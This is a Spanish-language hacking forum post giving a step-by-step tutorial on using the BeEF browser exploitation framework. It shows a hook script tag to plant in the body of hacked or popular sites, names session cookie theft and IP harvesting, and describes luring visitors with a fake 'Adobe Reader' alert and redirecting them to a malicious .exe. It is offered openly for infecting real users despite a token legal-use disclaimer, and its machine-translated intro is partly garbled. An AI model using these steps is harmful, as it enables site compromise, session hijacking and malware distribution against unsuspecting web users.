Android, Hacking, Programacion Y Mas!


    XSS Tunneling [BeEF] Para Infeccion

    Comparte
    avatar
    Admin
    Admin
    Admin

    Mensajes : 52
    Fecha de inscripción : 11/01/2013

    XSS Tunneling [BeEF] Para Infeccion

    Mensaje por Admin el Sáb Feb 16, 2013 11:17 am

    El marco de la explotación navegador (de res) es una potente herramienta
    de seguridad profesional. La carne vacuna es técnicas pioneras que
    proporcionan la experiencia de pruebas de penetración con los vectores
    de ataque prácticos de clientes secundarios.

    A diferencia de
    otros marcos de seguridad, se centra en el aprovechamiento de BeEF las
    vulnerabilidades del navegador para evaluar la postura de seguridad de
    un objetivo. Este proyecto se desarrolla exclusivamente para la
    investigación legal y las pruebas de penetración.

    BeEF ganchos de
    uno o más navegadores web como cabezas de playa para la puesta en
    marcha de los módulos de mando dirigidos. Cada navegador es probable que
    sea dentro de un contexto de seguridad diferente, y cada contexto puede
    proporcionar un conjunto de vectores de ataque únicas.


    *Bueno como ya sabemos mas o menos de que se trata esta herramienta empezemos con el tutorial:

    ====================================================================
    INICIEMOS:

    1- Descargamos BeEF de Su pagina oficial.
    http://beefproject.com/

    2- Desempaquetamos:



    3-En un Hosting montamos los Archivos..
    [url=http://www.google.hn/search?q=como subir archivos en un Hosting&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:es-ES:official&client=firefox-a#hl=es&client=firefox-a&hs=dem&rls=org.mozilla:es-ES:official&q=Como subir archivos en un Hosting&sa=X&ei=l8FWT-zsL-rL0QHSssypCg&ved=0CBYQgwM&bav=on.2,or.r_gc.r_pw.r_qf.,cf.osb&fp=651859265f284335&biw=1024&bih=639](Para los que preguntan como subir archivos a un hosting CLICK AQUI)[/url]

    Cuando acabemos vamos a la GUI



    -----------------------------------------------------------------------
    4-Una Vez Montado como saber si funka ¿?
    Simple Nos Ponemos en la GUI Very Happy


    *Y vamos al MENU VIEW Y ELEGIMOS LA 1 OPCION

    *Este Nos Brindara una ventana de EXAMPLE O PRUEBA si vemos q Al cabo de unos Segundos Conecta...

    Quiere decir q Nuestro BeEF esta Listo Very Happy!!!

    ------------------------------------------------------------------------
    5-COMO USARLO¿?
    Bueno vamos al menu q Nombre anteriormente VIEW/Spawn Zombie Example
    Nos saldra esta pag:



    Dicho codigo es un ARCHIVO SCRIPT q se encuentra en los archivos que nosotros subimos con el BEEF!

    Código: Seleccionar todo<script language='Javascript' src="http:// /beef/hook/beefmagic.js.php'></script>

    Ese
    Code Hay q Meterlo en el Body de las Paginas.. Su funcion seria crear
    un Puente...Se preguntan en q Paginas¿?... en las que Quieran...!!!
    EJEMPLO!... si logran meter el SCRIPT CODE en alguna pagina con usuarios
    EJEMPLO: facebook.com XD podrias robar SESIONES COOKIES.. Ademas
    Podrias meterlo en varias webs FAMOSAS CON MUCHA SVISITAS y a los users
    los Rediriges a un EXE y asi Podrias tener un Malware Infeccion.



    Mentiendo el Code en un INDEX de un Hacked HOST!
    Este Code Hara una Simulacion de q la web esta Cargando... y A la vez Conecta al BEEF CLIENT





    En Nuestro Client BEEF Veriamos esto....


    1 ZOMBIE A CONECTADO Very Happy

    Podriamos Robar Cookies

    Sacar IPS

    Enviar Alerts!

    Java Applet!

    Entr otras Funciones.....
    Enviando Alerts
    1- VISTA DESDE EL CLIENT MANAGER



    2-VISTA DESDE LA WEB Q RECIBE


    Aqui viene lo bueno lo que realmente queresmo hacer una infeccion

    Haciendo redireccion a Archivo Exe Mediante ING SOCIAL!
    1- Enviamos AlerT al usuario con algo q haga descarga
    EJEMPLO: "Para Ver la Pagina Necesita tener Adobe reader 3"



    El usuario dira Bueno lo Descargo de una....

    2- Le hacemos un redirect a Un Archivo.exe Simulando ser el Adobe Reader 3

    a- Vamos a NETWORK MODULES/ BROWSER REDIRECT



    b- Ingresamos el enlace con el .exe MALICIOSO



    c- Al abrirse el usuario creera q es el ADOBE q se le pidio anteriormente... y PFF



    CREDITOS:
    Maztor
    Corp-51

    [i]

      Fecha y hora actual: Miér Dic 13, 2017 4:22 pm